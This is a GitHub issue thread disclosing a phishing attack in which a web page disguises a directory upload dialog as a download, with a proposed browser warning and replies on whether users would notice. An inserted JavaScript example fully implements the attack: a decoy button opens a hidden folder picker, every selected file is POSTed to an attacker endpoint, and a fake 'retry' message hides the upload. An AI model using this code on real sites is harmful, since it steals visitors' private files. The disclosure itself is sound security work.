
Security issue of directory upload: pretending to download when actually uploading a directory

Open duanyao opened this issue 8 years ago • 2 comments

This issue was reported by alibaba.com and further demonstrated here.

For those who don't read Chinese, I rephrase this issue as follows:

  1. A malicious web page shows a button: "Click to download X software for free!"
  2. When a user clicks the button, the web page triggers a directory upload dialog.
  3. The user may overlook that the dialog is not "save as" but "select a directory to upload" and select a directory to save the file.
  4. The web page uploads the directory to the attacker's server.
  5. The web page may show a message: "Download failed, please retry", and replace the button mentioned above with a normal download button. So the user won't realize that an upload instead of a download happened.

I think UAs may show a warning dialog before showing the directory upload dialog: "The site xxx is asking you to upload a directory. Depending on the content of the directory, this may leak your personal information. Continue?"

duanyao avatar May 06 '16 03:05 duanyao
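The mechanics behind the five steps above, as an added example that is not part of the original issue or of the directory-upload spec: a click on a decoy "download" button opens a directory picker via a hidden `<input type="file" webkitdirectory>`, and on `change` the page receives every file in the chosen directory together with its relative path, which it can then POST. The function names, the constructed sample selection and the collection endpoint URL are assumptions for illustration.

```javascript
// Added example (not from the directory-upload repository or the issue author).
// Shows (a) what a page learns from a directory selection and (b) the browser
// wiring that turns a "download" click into a directory upload dialog.

// Constructed sample: the kind of FileList a directory picker returns. Each entry
// carries webkitRelativePath ("topdir/sub/file"), which a plain file picker leaves "".
const SAMPLE_SELECTION = [
  { name: 'report.pdf', size: 1024, webkitRelativePath: 'Downloads/report.pdf' },
  { name: 'id_rsa',     size: 2048, webkitRelativePath: 'Downloads/.ssh/id_rsa' },
  { name: 'notes.txt',  size: 512,  webkitRelativePath: 'Downloads/private/notes.txt' },
];

// Summarise a selection: this is what the page (and therefore the attacker's
// server) learns before a single byte of content is sent.
function summarizeSelection(files) {
  const summary = { count: 0, totalBytes: 0, topLevelDir: null, paths: [] };
  for (const f of Array.from(files)) {
    const rel = f.webkitRelativePath || f.name;
    summary.count += 1;
    summary.totalBytes += f.size;
    summary.paths.push(rel);
    if (summary.topLevelDir === null) summary.topLevelDir = rel.split('/')[0];
  }
  return summary;
}

// True when the selection came from a directory picker: every file has a
// relative path containing a separator. A single-file "save as"-looking
// selection never does, which is the cue the user in the report overlooks.
function isDirectorySelection(files) {
  const list = Array.from(files);
  return list.length > 0 && list.every(
    (f) => typeof f.webkitRelativePath === 'string' && f.webkitRelativePath.includes('/'),
  );
}

// Browser-only wiring for the decoy button (guarded so the file also loads
// under Node). `endpoint` is a hypothetical attacker-controlled URL.
function wireDecoyDownload(button, endpoint) {
  if (typeof document === 'undefined') return null;
  const input = document.createElement('input');
  input.type = 'file';
  input.webkitdirectory = true;   // makes the dialog "select a folder to upload"
  input.multiple = true;
  input.hidden = true;
  document.body.appendChild(input);

  // input.click() is permitted here because it runs inside the user's click.
  button.addEventListener('click', () => input.click());

  input.addEventListener('change', async () => {
    const form = new FormData();
    for (const f of Array.from(input.files)) {
      form.append('files[]', f, f.webkitRelativePath);  // path preserved server-side
    }
    try {
      await fetch(endpoint, { method: 'POST', body: form });
    } finally {
      // Step 5 of the report: hide what happened behind a "retry" message.
      button.textContent = 'Download failed, please retry';
    }
  });
  return input;
}
```

Nothing in this flow differs, from the page's side, from a legitimate directory upload; the only user-visible cue is the dialog's own title and the absence of a file-name box, which is why the report proposes a user-agent-level warning rather than anything a site could enforce.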

Most users would probably realize this since in addition to the "Select a folder to upload" text, there would also be no textbox for the name of the file to save.

DanielHerr avatar Jun 09 '16 03:06 DanielHerr

Sorry for the late response. Sure, but some users may be accustomed to keeping the original file name when downloading a file, so they may overlook that the file name is not shown. Additionally, some users may interpret the missing file name as "a recent UX change of the browser" rather than a phishing trick.

duanyao avatar Jul 07 '16 01:07 duanyao